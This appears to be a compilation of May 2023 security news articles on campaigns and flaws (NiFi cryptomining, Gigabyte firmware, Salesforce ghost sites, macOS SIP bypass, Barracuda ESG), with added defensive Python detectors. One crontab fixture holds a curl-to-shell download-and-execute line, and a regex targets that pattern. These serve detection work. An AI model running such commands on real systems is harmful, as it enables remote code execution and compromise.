

Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining
31.5.23  Cryptocurrency  The Hacker News
A financially motivated threat actor is actively scouring the internet for unprotected Apache NiFi instances to covertly install a cryptocurrency miner and facilitate lateral movement.

The findings come from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests for "/nifi" on May 19, 2023.

"Persistence is achieved via timed processors or entries to cron," said Dr. Johannes Ullrich, dean of research for SANS Technology Institute. "The attack script is not saved to the system. The attack scripts are kept in memory only."

A honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the "/var/log/syslog" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server.

It's worth pointing out that Kinsing has a track record of leveraging publicly disclosed vulnerabilities in publicly accessible web applications to carry out its attacks.

In September 2022, Trend Micro detailed an identical attack chain that utilized old Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to deliver the cryptocurrency mining malware.
Select attacks mounted by the same threat actor against exposed NiFi servers also entail the execution of a second shell script that's designed to collect SSH keys from the infected host to connect to other systems within the victim's organization.

A notable indicator of the ongoing campaign is that both the scanning and the actual attack activity originate from the IP address 109.207.200[.]43 and target TCP ports 8080 and 8443.

"Due to its use as a data processing platform, NiFi servers often have access to business-critical data," SANS ISC said. "NiFi servers are likely attractive targets as they are configured with larger CPUs to support data transformation tasks. The attack is trivial if the NiFi server is not secured."
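The two observable signals in the write-up above are the inbound probing of "/nifi" on the NiFi ports (8080/8443) and the cron-based persistence on a compromised host. The following is an added example, not code from SANS ISC or The Hacker News: a small detector that runs over web-server access logs and a crontab. The log layout (combined format with the local port appended as a trailing field), the sample lines and the sample crontab are constructed for the example; only the source IP and ports come from the article.

```python
import re
from collections import Counter

# Indicators from the SANS ISC write-up: the scanning/attack source and the NiFi ports it hits.
IOC_SCANNER_IP = "109.207.200.43"
NIFI_PORTS = {8080, 8443}
NIFI_PATH_RE = re.compile(r"^/nifi(?:-api)?(?:/|$|\?)")

# Combined access-log format with the local port appended as a trailing field.
# This layout is an assumption for the example; adapt the regex to your own proxy/web server logs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<dport>\d+)$'
)

# Constructed sample lines (not real telemetry): the IOC address probing /nifi and the NiFi REST API,
# a second source that got a 401 because authentication was on, and ordinary traffic on port 80.
SAMPLE_LOG = """\
109.207.200.43 - - [19/May/2023:10:01:02 +0000] "GET /nifi HTTP/1.1" 200 512 "-" "Mozilla/5.0" 8080
109.207.200.43 - - [19/May/2023:10:01:03 +0000] "GET /nifi-api/flow/process-groups/root HTTP/1.1" 200 4096 "-" "Mozilla/5.0" 8080
109.207.200.43 - - [19/May/2023:10:01:05 +0000] "POST /nifi-api/process-groups/root/processors HTTP/1.1" 201 256 "-" "Mozilla/5.0" 8443
198.51.100.7 - - [19/May/2023:10:02:00 +0000] "GET /nifi HTTP/1.1" 401 0 "-" "curl/7.88" 8080
198.51.100.7 - - [19/May/2023:10:05:00 +0000] "GET / HTTP/1.1" 200 1024 "-" "curl/7.88" 80
203.0.113.9 - - [19/May/2023:10:06:00 +0000] "GET /nifi/ HTTP/1.1" 200 512 "-" "Mozilla/5.0" 8443
"""

# Cron lines that download and pipe straight into a shell, or drop a file into /tmp or /dev/shm,
# are the shape of the cron persistence the article describes.
CRON_DOWNLOAD_EXEC_RE = re.compile(
    r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b|\b(?:curl|wget)\b.*\s-[oO]\s*/(?:tmp|dev/shm)/"
)

# Constructed crontab: one legitimate job and one download-and-execute entry (documentation IP).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL http://203.0.113.50/x.sh | sh
"""

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the expected layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    rec["status"] = int(rec["status"])
    return rec

def detect_nifi_scan(lines, threshold=3):
    """Count /nifi and /nifi-api requests per source on the NiFi ports and flag heavy hitters.

    Returns the sources at or above `threshold` probes, the per-source counts, and how many
    lines came from the published IOC address (any traffic from it is worth a look).
    """
    probes = Counter()
    ioc_hits = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["src"] == IOC_SCANNER_IP:
            ioc_hits += 1
        if rec["dport"] in NIFI_PORTS and NIFI_PATH_RE.match(rec["path"]):
            probes[rec["src"]] += 1
    scanners = sorted(src for src, n in probes.items() if n >= threshold)
    return {"scanners": scanners, "probe_counts": dict(probes), "ioc_hits": ioc_hits}

def suspicious_cron_entries(crontab_text):
    """Return crontab lines (comments skipped) that fetch remote content and execute it."""
    return [
        ln for ln in crontab_text.splitlines()
        if ln.strip() and not ln.lstrip().startswith("#") and CRON_DOWNLOAD_EXEC_RE.search(ln)
    ]

if __name__ == "__main__":
    print(detect_nifi_scan(SAMPLE_LOG.splitlines()))
    print(suspicious_cron_entries(SAMPLE_CRONTAB))
```

The cron check only covers the on-disk variant of the persistence; the article notes the attack script itself stays in memory, so a review of running NiFi processors (timed processors are the other persistence route named above) is still needed.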


Critical Firmware Vulnerability in Gigabyte Systems Exposes ~7 Million Devices
31.5.23  Vulnerability  The Hacker News
Cybersecurity researchers have found "backdoor-like behavior" within Gigabyte systems, which they say enables the UEFI firmware of the devices to drop a Windows executable and retrieve updates in an unsecure format.

Firmware security firm Eclypsium said it first detected the anomaly in April 2023. Gigabyte has since acknowledged and addressed the issue.

"Most Gigabyte firmware includes a Windows Native Binary executable embedded inside of the UEFI firmware," John Loucaides, senior vice president of strategy at Eclypsium, told The Hacker News.

"The detected Windows executable is dropped to disk and executed as part of the Windows startup process, similar to the LoJack double agent attack. This executable then downloads and runs additional binaries via insecure methods."

"Only the intention of the author can distinguish this sort of vulnerability from a malicious backdoor," Loucaides added.

The executable, per Eclypsium, is embedded into UEFI firmware and written to disk by firmware as part of the system boot process and subsequently launched as an update service.

The .NET-based application, for its part, is configured to download and execute a payload from Gigabyte update servers over plain HTTP, thereby exposing the process to adversary-in-the-middle (AitM) attacks via a compromised router.

Loucaides said the software "seems to have been intended as a legitimate update application," noting the issue potentially impacts "around 364 Gigabyte systems with a rough estimate of 7 million devices."

With threat actors constantly on the lookout for ways to remain undetected and leave a minimal intrusion footprint, vulnerabilities in the privileged firmware update mechanism could pave the way for stealthy UEFI bootkits and implants that can subvert all security controls running in the operating system plane.

To make matters worse, since the UEFI code resides on the motherboard, malware injected to the firmware can persist even if drives are wiped and the operating system is reinstalled.
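The weakness above is an updater that fetches and runs a payload over plain HTTP with no integrity check. As an added example (not Gigabyte's or Eclypsium's code), the block below puts that pattern next to the minimum a firmware-dropped updater should do before executing anything it downloaded: insist on TLS, pin the update host, and compare the payload against a digest from a manifest that itself arrived securely. The host name, the payload bytes and the digest are constructed for the example.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Hypothetical trust anchors for the example: the only host the updater may fetch from, and the
# SHA-256 of the payload as listed in a manifest that itself arrived over TLS (or is signed).
ALLOWED_UPDATE_HOSTS = {"updates.example.com"}

def insecure_update_check(url: str) -> bool:
    """The weak pattern: any http(s) URL is accepted and nothing about the payload is verified."""
    return url.startswith(("http://", "https://"))

def secure_update_check(url: str, payload: bytes, expected_sha256: str) -> list:
    """Return the reasons the update must NOT be run; an empty list means every check passed."""
    problems = []
    u = urlparse(url)
    if u.scheme != "https":
        problems.append(f"scheme {u.scheme!r} is not https: an on-path attacker can swap the payload")
    if u.hostname not in ALLOWED_UPDATE_HOSTS:
        problems.append(f"host {u.hostname!r} is not an allowed update server")
    actual = hashlib.sha256(payload).hexdigest()
    # constant-time compare is a habit worth keeping even for values that are not secrets
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        problems.append("payload SHA-256 does not match the manifest")
    return problems

# Constructed stand-ins: a "known good" updater binary and a copy modified in transit.
GOOD_PAYLOAD = b"MZ\x90\x00 constructed stand-in for an updater binary"
GOOD_SHA256 = hashlib.sha256(GOOD_PAYLOAD).hexdigest()
TAMPERED_PAYLOAD = GOOD_PAYLOAD + b"\x00 injected by an on-path attacker"

def demo():
    good_url = "https://updates.example.com/app.exe"
    http_url = "http://updates.example.com/app.exe"
    return {
        "insecure_accepts_http": insecure_update_check(http_url),
        "secure_rejects_http": secure_update_check(http_url, GOOD_PAYLOAD, GOOD_SHA256),
        "secure_rejects_tampered": secure_update_check(good_url, TAMPERED_PAYLOAD, GOOD_SHA256),
        "secure_accepts_good": secure_update_check(good_url, GOOD_PAYLOAD, GOOD_SHA256),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

A pinned digest is only as trustworthy as the channel that delivered it; in practice the manifest should be signed with a vendor key baked into the firmware, so that neither the payload nor its hash can be replaced by whoever controls the router.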

Organizations are advised to apply the latest firmware updates to minimize potential risks. It's also advised to inspect and disable the "APP Center Download & Install" feature in UEFI/BIOS Setup and set a BIOS password to deter malicious changes.

"Firmware updates have notoriously low uptake with end users," Loucaides said. "Therefore, it is easy to understand thinking that an update application in firmware may help."

"However, the irony of a highly insecure update application, baked into firmware to automatically download and run a payload, is not lost."


Beware of Ghost Sites: Silent Threat Lurking in Your Salesforce Communities
31.5.23  Cyber  The Hacker News
Improperly deactivated and abandoned Salesforce Sites and Communities (aka Experience Cloud) could pose severe risks to organizations, leading to unauthorized access to sensitive data.

Data security firm Varonis dubbed the abandoned, unprotected, and unmonitored resources "ghost sites."

"When these Communities are no longer needed, though, they are often set aside but not deactivated," Varonis Threat Labs researchers said in a new report shared with The Hacker News.

"Because these unused sites are not maintained, they aren't tested against vulnerabilities, and Admins fail to update the site's security measures according to newer guidelines."

Varonis said it found many of these set-aside (but still active) sites continuing to receive new data, which allows threat actors to extract it by manipulating the Host header of the HTTP request to target the site's internal URL.

Identifying the complete internal URLs associated with the sites is challenging but not impossible, as an adversary could leverage tools like SecurityTrails that track changes to DNS records.

Compounding the risk further is the fact that the obsolete sites lack the latest security protections, making them an ideal target for threat actors looking to siphon sensitive information.

"The exposed data is not restricted to only old data from when the site was in use; it also includes new records that were shared with the guest user, due to the sharing configuration in their Salesforce environment," the researchers said.

To mitigate the threats associated with ghost sites, organizations are advised to keep track of all Salesforce sites and their respective users' permissions. It's also recommended to properly deactivate sites that are no longer in use.
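The mechanism behind a ghost site is ordinary name-based virtual hosting: the front end picks the tenant site from the Host header, so removing the DNS record does not stop a client that connects to the shared address and supplies the old name itself. The following added example (not Varonis' tooling or any Salesforce code) reproduces that on a local loopback server with a constructed two-site table, and shows the probe a defender can run against their own site inventory.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed virtual-host table standing in for a tenant's Experience Cloud sites: one live site and
# one that was "set aside" (DNS record and links removed) but never deactivated on the platform.
SITES = {
    "portal.example.com": b"welcome to the live partner portal",
    "oldpartners.example.com": b"2019 partner price list and contact sheet (still served)",
}

class VHostHandler(BaseHTTPRequestHandler):
    """Picks the site purely from the Host header, as a multi-tenant front end does."""

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0].lower()
        body = SITES.get(host)
        if body is None:
            body = b"no such site"
            self.send_response(404)
        else:
            self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence request logging for the demo
        pass

def start_server():
    """Bind an ephemeral loopback port and serve in a background thread; returns the server."""
    srv = HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def fetch_with_host(port, host_header):
    """Connect to the shared IP directly (DNS is not consulted) and supply the Host header ourselves."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    try:
        conn.request("GET", "/", headers={"Host": host_header})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()

def probe_hosts(port, hostnames):
    """Map each candidate hostname to the status the front end returns for it."""
    return {h: fetch_with_host(port, h)[0] for h in hostnames}

if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    # "oldpartners" has no DNS record any more, yet the front end still answers for it.
    print(probe_hosts(port, ["portal.example.com", "oldpartners.example.com", "gone.example.com"]))
    srv.shutdown()
```

Run the same probe against your own platform endpoint with the list of every site name the organization has ever registered (DNS history services are one source, as the article notes); any name that still answers 200 but is absent from the live inventory is a candidate ghost site.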


Microsoft Details Critical Apple macOS Vulnerability Allowing SIP Protection Bypass
31.5.23  Apple  The Hacker News
Microsoft has shared details of a now-patched flaw in Apple macOS that could be abused by threat actors with root access to bypass security enforcements and perform arbitrary actions on affected devices.

Specifically, the flaw – dubbed Migraine and tracked as CVE-2023-32369 – could be abused to get around a key security measure called System Integrity Protection (SIP), or "rootless," which limits the actions the root user can perform on protected files and folders.

"The most straight-forward implication of a SIP bypass is that [...] an attacker can create files that are protected by SIP and therefore undeletable by ordinary means," Microsoft researchers Jonathan Bar Or, Michael Pearse, and Anurag Bohra said.

Even worse, it could be exploited to gain arbitrary kernel code execution and even access sensitive data by replacing databases that manage Transparency, Consent, and Control (TCC) policies.

The bypass is made possible by leveraging a built-in macOS tool called Migration Assistant to activate the migration process via an AppleScript that's designed to ultimately launch an arbitrary payload.

This, in turn, stems from the fact that systemmigrationd – the daemon used to handle device transfer – comes with the com.apple.rootless.install.heritable entitlement, allowing all its child processes, including bash and perl, to bypass SIP checks.

As a result, a threat actor already with code execution capabilities as root could trigger systemmigrationd to run perl, which could then be used to run a malicious shell script as the migration process is underway.
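The root cause above is an entitlement, and entitlements are auditable: the XML plist printed by `codesign -d --entitlements` for a binary lists them. As an added example (not Microsoft's or Apple's code), the block below parses such a plist and flags the SIP-write entitlements, distinguishing the heritable variant whose effect passes to every child process. The two entitlement blobs are constructed for the example and are not the real entitlements of systemmigrationd.

```python
import plistlib

# Entitlements that let a process write to SIP-protected locations. With the ".heritable" variant,
# every child process inherits the capability, which is the whole Migraine problem.
SIP_WRITE_ENTITLEMENTS = {
    "com.apple.rootless.install",
    "com.apple.rootless.install.heritable",
}

# Constructed entitlements blobs in the XML plist shape that `codesign -d --entitlements` prints.
# They are made up for the example and are not the real entitlements of systemmigrationd.
SAMPLE_HERITABLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.rootless.install.heritable</key>
    <true/>
    <key>com.apple.security.app-sandbox</key>
    <false/>
</dict>
</plist>
"""

SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.security.app-sandbox</key>
    <true/>
    <key>com.apple.security.network.client</key>
    <true/>
</dict>
</plist>
"""

def audit_entitlements(plist_bytes):
    """Return one finding per SIP-write entitlement that is set to true in the blob."""
    ents = plistlib.loads(plist_bytes)
    findings = []
    for name in sorted(SIP_WRITE_ENTITLEMENTS):
        if ents.get(name) is True:
            heritable = name.endswith(".heritable")
            findings.append({
                "entitlement": name,
                "children_inherit": heritable,
                "impact": ("any child (bash, perl, tools launched via AppleScript) can modify SIP-protected paths"
                           if heritable else "the process itself can modify SIP-protected paths"),
            })
    return findings

def child_processes_bypass_sip(plist_bytes):
    """Convenience predicate for the Migraine-style question: do this daemon's children escape SIP?"""
    return any(f["children_inherit"] for f in audit_entitlements(plist_bytes))

if __name__ == "__main__":
    for label, blob in (("heritable", SAMPLE_HERITABLE), ("benign", SAMPLE_BENIGN)):
        print(label, audit_entitlements(blob), child_processes_bypass_sip(blob))
```

The useful hunting question is not "which binaries hold the entitlement" (Apple's own daemons legitimately do) but "which entitled daemons can be made to spawn an attacker-controlled interpreter", which is what the migration flow above allowed.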

Following responsible disclosure, the vulnerability was addressed by Apple as part of updates (macOS Ventura 13.4, macOS Monterey 12.6.6, and macOS Big Sur 11.7.7) shipped on May 18, 2023.

The iPhone maker described CVE-2023-32369 as a logic issue that could allow a malicious app to modify protected parts of the file system.

Migraine is the latest addition to the list of macOS security bypasses that have been documented under the names Shrootless (CVE-2021-30892, CVSS score: 5.5), powerdir (CVE-2021-30970, CVSS score: 5.5), and Achilles (CVE-2022-42821, CVSS score: 5.5).

"The implications of arbitrary SIP bypasses are serious, as the potential for malware authors is significant," the researchers said.

"Bypassing SIP could lead to serious consequences, such as increasing the potential for attackers and malware authors to successfully install rootkits, create persistent malware, and expand the attack surface for additional techniques and exploits."

The findings come as Jamf Threat Labs disclosed details of a type confusion flaw in the macOS kernel that could be weaponized by a rogue app installed on the device to execute arbitrary code with kernel privileges.

Labeled ColdInvite (aka CVE-2023-27930), the flaw "can be exploited to leverage the co-processor in order to obtain read/write privileges to the kernel, allowing a bad actor to get closer to realizing their ultimate goal of fully compromising the device."


Dark Pink APT Group Leverages TelePowerBot and KamiKakaBot in Sophisticated Attacks
31.5.23  APT  The Hacker News
The threat actor known as Dark Pink has been linked to five new attacks aimed at various entities in Belgium, Brunei, Indonesia, Thailand, and Vietnam between February 2022 and April 2023.

This includes educational institutions, government agencies, military bodies, and non-profit organizations, indicating the adversarial crew's continued focus on high-value targets.

Dark Pink, also called Saaiwc Group, is an advanced persistent threat (APT) actor believed to be of Asia-Pacific origin, with attacks targeting entities primarily located in East Asia and, to a lesser extent, in Europe.

The group employs a set of custom malware tools such as TelePowerBot and KamiKakaBot that provide various functions to exfiltrate sensitive data from compromised hosts.

"The group uses a range of sophisticated custom tools, deploys multiple kill chains relying on spear-phishing emails," Group-IB security researcher Andrey Polovinkin said in a technical report shared with The Hacker News.

"Once the attackers gain access to a target's network, they use advanced persistence mechanisms to stay undetected and maintain control over the compromised system."

The findings also illustrate some key modifications to the Dark Pink attack sequence to impede analysis as well as accommodate improvements to KamiKakaBot, which executes commands from a threat actor-controlled Telegram channel via a Telegram bot.

The latest version, notably, splits its functionality into two distinct parts: One for controlling devices and the other for harvesting valuable information.

The Singapore-headquartered company said it also identified a new GitHub account associated with the threat actor that hosts PowerShell scripts, ZIP archives, and custom malware for subsequent installation onto victim machines. These modules were uploaded between January 9, 2023, and April 11, 2023.

Besides using Telegram for command-and-control, Dark Pink has been observed exfiltrating stolen data over HTTP using a service called webhook[.]site. Another notable aspect is the use of a Microsoft Excel add-in to ensure the persistence of TelePowerBot within the infected host.

"With webhook[.]site, it is possible to set up temporary endpoints in order to capture and view incoming HTTP requests," Polovinkin noted. "The threat actor created temporary endpoints and sent sensitive data stolen from victims."

Dark Pink, its espionage motives notwithstanding, remains shrouded in mystery. That said, it's suspected the hacking crew's victimology footprint could be broader than previously assumed.

While the latest discovery brings the attack tally to 13 (counting the five new victims) since mid-2021, the small number also reflects the adversary's effort to keep a low profile: the threat actors appear to select their targets carefully and keep the number of attacks to a minimum to reduce the likelihood of exposure.

"The fact that two attacks were executed in 2023 indicates that Dark Pink remains active and poses an ongoing risk to organizations," Polovinkin said. "Evidence shows that the cybercriminals behind these attacks keep updating their existing tools in order to remain undetected."


RomCom RAT Using Deceptive Web of Rogue Software Sites for Covert Attacks
31.5.23  Virus  The Hacker News
The threat actors behind RomCom RAT are leveraging a network of fake websites advertising rogue versions of popular software at least since July 2022 to infiltrate targets.

Cybersecurity firm Trend Micro is tracking the activity cluster under the name Void Rabisu, which is also known as Tropical Scorpius (Unit 42) and UNC2596 (Mandiant).

"These lure sites are most likely only meant for a small number of targets, thus making discovery and analysis more difficult," security researchers Feike Hacquebord, Stephen Hilt, Fernando Merces, and Lord Alfred Remorin said.

Some of the impersonated apps spotted so far include AstraChat, Devolutions' Remote Desktop Manager, Gimp, GoTo Meeting, KeePass, OpenAI ChatGPT, Signal, Veeam Backup & Replication, and WinDirStat.

RomCom RAT was first chronicled by Palo Alto Networks Unit 42 in August 2022, linking it to a financially motivated group deploying Cuba Ransomware (aka COLDDRAW). It's worth noting that there is no evidence to suggest that the ransomware gang has any connection or affiliation with the Republic of Cuba.

The remote access trojan has since been used heavily in attacks targeting Ukrainian state bodies and military systems via spoofed versions of legitimate software. Other isolated targets have been located in the Americas and Asia.

Void Rabisu has also been observed abusing Google Ads to trick users into visiting the lure sites as part of narrowly targeted attacks, making it the latest addition in a long list of threat actors finding fresh avenues for gaining initial access into victims' systems.

"RomCom used spear-phishing against a member of a European parliament in March 2022, but targeted a European defense company in October 2022 with a Google Ads advertisement that led to an intermediary landing site that would redirect to a RomCom lure site," Trend Micro said.

This points to the adversary mixing its targeting methodology to encompass tactics associated with both cybercrime actors and nation-state groups.

The shift in RomCom RAT's usage as a backdoor for targeted intrusions has been complemented by significant improvements to the malware that scales up the number of supported commands from 20 to 49, enabling it to exert total control over the compromised hosts.

This also includes the ability to download additional payloads to take screenshots, grab crypto wallet data, siphon chat messages and FTP credentials, and use a browser password stealer dubbed StealDeal.

Another notable aspect of the attacks is the use of certificates to lend credibility to the malicious software installers, with samples signed by seemingly innocuous companies based in the U.S. and Canada.

"The line is blurring between cybercrime driven by financial gain and APT attacks motivated by geopolitics, espionage, disruption, and warfare," the researchers said.

"Since the rise of Ransomware-as-a-Service (RaaS), cybercriminals are now using advanced tactics and targeted attacks that were previously thought to be the domain of APT actors. Inversely, tactics and techniques that were previously used by financially motivated actors are increasingly being used in attacks with geopolitical goals."


Alert: Hackers Exploit Barracuda Email Security Gateway 0-Day Flaw for 7 Months
31.5.23  Exploit  The Hacker News
Enterprise security firm Barracuda on Tuesday disclosed that a recently patched zero-day flaw in its Email Security Gateway (ESG) appliances had been abused by threat actors since October 2022 to backdoor the devices.

The latest findings show that the critical vulnerability, tracked as CVE-2023-2868 (CVSS score: N/A), has been actively exploited for at least seven months prior to its discovery.

The flaw, which Barracuda identified on May 19, 2023, affects versions 5.1.3.001 through 9.2.0.006 and could allow a remote attacker to achieve code execution on susceptible installations. Patches were released by Barracuda on May 20 and May 21.

"CVE-2023-2868 was utilized to obtain unauthorized access to a subset of ESG appliances," the network and email security company said in an updated advisory.

"Malware was identified on a subset of appliances allowing for persistent backdoor access. Evidence of data exfiltration was identified on a subset of impacted appliances."

Three different malware strains have been discovered to date -

SALTWATER - A trojanized module for the Barracuda SMTP daemon (bsmtpd) that's equipped to upload or download arbitrary files, execute commands, as well as proxy and tunnel malicious traffic to fly under the radar.
SEASPY - An x64 ELF backdoor that offers persistence capabilities and is activated by means of a magic packet.
SEASIDE - A Lua-based module for bsmtpd that establishes reverse shells in response to SMTP HELO/EHLO commands sent from the malware's command-and-control (C2) server.

Source code overlaps have been identified between SEASPY and an open source backdoor called cd00r, according to Google-owned Mandiant, which is investigating the incident. The attacks have not been attributed to a known threat actor or group.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) last week also added the bug to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by June 16, 2023.
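SEASIDE's trigger lives in the one SMTP field a gateway must accept from any stranger: the EHLO/HELO argument, which per RFC 5321 should be a hostname or a bracketed address literal. That makes a cheap detection possible on SMTP session logs from the gateway or from the MTA behind it. The following is an added example, not Barracuda's or Mandiant's detection logic; the transcript layout and every line in it are constructed, and the flagged arguments are placeholders, not the actual SEASIDE trigger format (which the advisory does not publish).

```python
import base64
import re

# A legitimate EHLO/HELO argument is a hostname or a bracketed address literal (RFC 5321, 4.1.1.1).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
ADDR_LITERAL_RE = re.compile(r"^\[(?:\d{1,3}(?:\.\d{1,3}){3}|IPv6:[0-9A-Fa-f:.]+)\]$")
SHELL_META_RE = re.compile(r"[;|`$&<>(){}]")
B64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

# Constructed transcript in a made-up "timestamp client verb argument" layout (not Barracuda's log format).
_B64 = base64.b64encode(b"connect-back 192.0.2.77 4444").decode()
SAMPLE_SMTP_LOG = (
    "2023-05-20T01:00:01Z 198.51.100.20 EHLO mail.partner.example.net\n"
    "2023-05-20T01:00:03Z 198.51.100.20 MAIL FROM:<alice@partner.example.net>\n"
    "2023-05-20T01:00:07Z 203.0.113.5 HELO [203.0.113.5]\n"
    f"2023-05-20T01:00:09Z 192.0.2.77 EHLO {_B64}\n"
    "2023-05-20T01:00:12Z 192.0.2.77 EHLO x;id\n"
    "2023-05-20T01:00:15Z 198.51.100.21 EHLO smtp.example.org\n"
)

def classify_ehlo_arg(arg):
    """Return None for a plausible hostname/address literal, otherwise a short reason string."""
    if SHELL_META_RE.search(arg) or " " in arg:
        return "shell metacharacters in EHLO/HELO argument"
    if B64_BLOB_RE.match(arg) and len(arg) % 4 == 0:
        try:
            decoded = base64.b64decode(arg, validate=True)
        except ValueError:
            decoded = b""
        if decoded and all(32 <= b < 127 for b in decoded):
            return "base64 blob decoding to printable text"
    if HOSTNAME_RE.match(arg) or ADDR_LITERAL_RE.match(arg):
        return None
    return "not a hostname or address literal"

def scan_smtp_log(text):
    """Walk the transcript and report every EHLO/HELO whose argument does not look like a hostname."""
    hits = []
    for line in text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[2].upper() not in ("EHLO", "HELO"):
            continue
        reason = classify_ehlo_arg(parts[3])
        if reason:
            hits.append({"client": parts[1], "arg": parts[3], "reason": reason})
    return hits

if __name__ == "__main__":
    for h in scan_smtp_log(SAMPLE_SMTP_LOG):
        print(h)
```

Expect some noise from misconfigured but harmless senders (bare IPs without brackets, Windows machine names with underscores); the signal to chase is a non-hostname argument followed by outbound connections from the gateway to the same client, since SEASIDE's purpose is a reverse shell.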

Barracuda did not disclose how many organizations were breached, but noted they were directly contacted with mitigation guidance. It also warned that the ongoing probe may unearth additional users who may have been affected.


Hackers Win $105,000 for Reporting Critical Security Flaws in Sonos One Speakers
30.5.23  Vulnerability  The Hacker News
Multiple security flaws uncovered in Sonos One wireless speakers could be potentially exploited to achieve information disclosure and remote code execution, the Zero Day Initiative (ZDI) said in a report published last week.

The vulnerabilities were demonstrated by three different teams from Qrious Secure, STAR Labs, and DEVCORE at the Pwn2Own hacking contest held in Toronto late last year, netting them $105,000 in monetary rewards.

The list of four flaws, which impact Sonos One Speaker 70.3-35220, is below -

CVE-2023-27352 and CVE-2023-27355 (CVSS scores: 8.8) - Unauthenticated flaws that allow network-adjacent attackers to execute arbitrary code on affected installations.
CVE-2023-27353 and CVE-2023-27354 (CVSS score: 6.5) - Unauthenticated flaws that allow network-adjacent attackers to disclose sensitive information on affected installations.
CVE-2023-27352 stems from the processing of SMB directory query commands, while CVE-2023-27355 exists within the MPEG-TS parser. Successful exploitation of either shortcoming could permit an attacker to execute arbitrary code in the context of the root user.

Each of the information disclosure flaws can be chained with other flaws in the system to achieve code execution with elevated privileges.

Following responsible disclosure on December 29, 2022, the flaws were addressed by Sonos as part of Sonos S2 and S1 software versions 15.1 and 11.7.1, respectively. Users are recommended to apply the latest patches to mitigate potential risks.


CAPTCHA-Breaking Services with Human Solvers Helping Cybercriminals Defeat Security
30.5.23  Security  The Hacker News
Cybersecurity researchers are warning about CAPTCHA-breaking services that are being offered for sale to bypass systems designed to distinguish legitimate users from bot traffic.

"Because cybercriminals are keen on breaking CAPTCHAs accurately, several services that are primarily geared toward this market demand have been created," Trend Micro said in a report published last week.

"These CAPTCHA-solving services don't use [optical character recognition] techniques or advanced machine learning methods; instead, they break CAPTCHAs by farming out CAPTCHA-breaking tasks to actual human solvers."

CAPTCHA – short for Completely Automated Public Turing test to tell Computers and Humans Apart – is a tool for differentiating real human users from automated users with the goal of combating spam and restricting fake account creation.

While CAPTCHA mechanisms can be a disruptive user experience, they are seen as an effective means to counter attacks from bot-originating web traffic.

The illicit CAPTCHA-solving services work by funneling requests sent by customers and delegating them to their human solvers, who work out the solution and submit the results back to the users.

This, in turn, is achieved by calling an API to submit the CAPTCHA and invoking a second API to get the results.

"This makes it easy for the customers of CAPTCHA-breaking services to develop automated tools against online web services," security researcher Joey Costoya said. "And because actual humans are solving CAPTCHAs, the purpose of filtering out automated bot traffic through these tests is rendered ineffective."

That's not all. Threat actors have been observed purchasing CAPTCHA-breaking services and combining them with proxyware offerings to obscure the originating IP address and evade antibot barriers.

Proxyware, although marketed as a utility to share a user's unused internet bandwidth with other parties in return for a "passive income," essentially turns the devices running them into residential proxies.

In one instance of a CAPTCHA-breaking service targeting popular social commerce marketplace Poshmark, the task requests emanating from a bot are routed via a proxyware network.

"CAPTCHAs are common tools used to prevent spam and bot abuse, but the increasing use of CAPTCHA-breaking services has made CAPTCHAs less effective," Costoya said. "While online web services can block abusers' originating IPs, the rise of proxyware adoption renders this method as toothless as CAPTCHAs."

To mitigate such risks, online web services are recommended to supplement CAPTCHAs and IP blocklisting with other anti-abuse tools.
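The report's closing advice is to stop relying on the two controls that human solvers and proxyware defeat (the CAPTCHA and the IP blocklist). One concrete supplement is a velocity check that counts the same request against several keys at once, so a fresh residential exit IP on every request does not reset the count. The following is an added example, not Trend Micro's or any marketplace's anti-abuse code; the limits, the "fingerprint" key and the bot scenario are constructed for illustration.

```python
from collections import defaultdict, deque

class AbuseVelocityGuard:
    """Sliding-window request counters over several keys at once.

    IP alone is useless against proxyware (every request arrives from a fresh residential address),
    so the same request is also counted against a client fingerprint and against the target it acts on.
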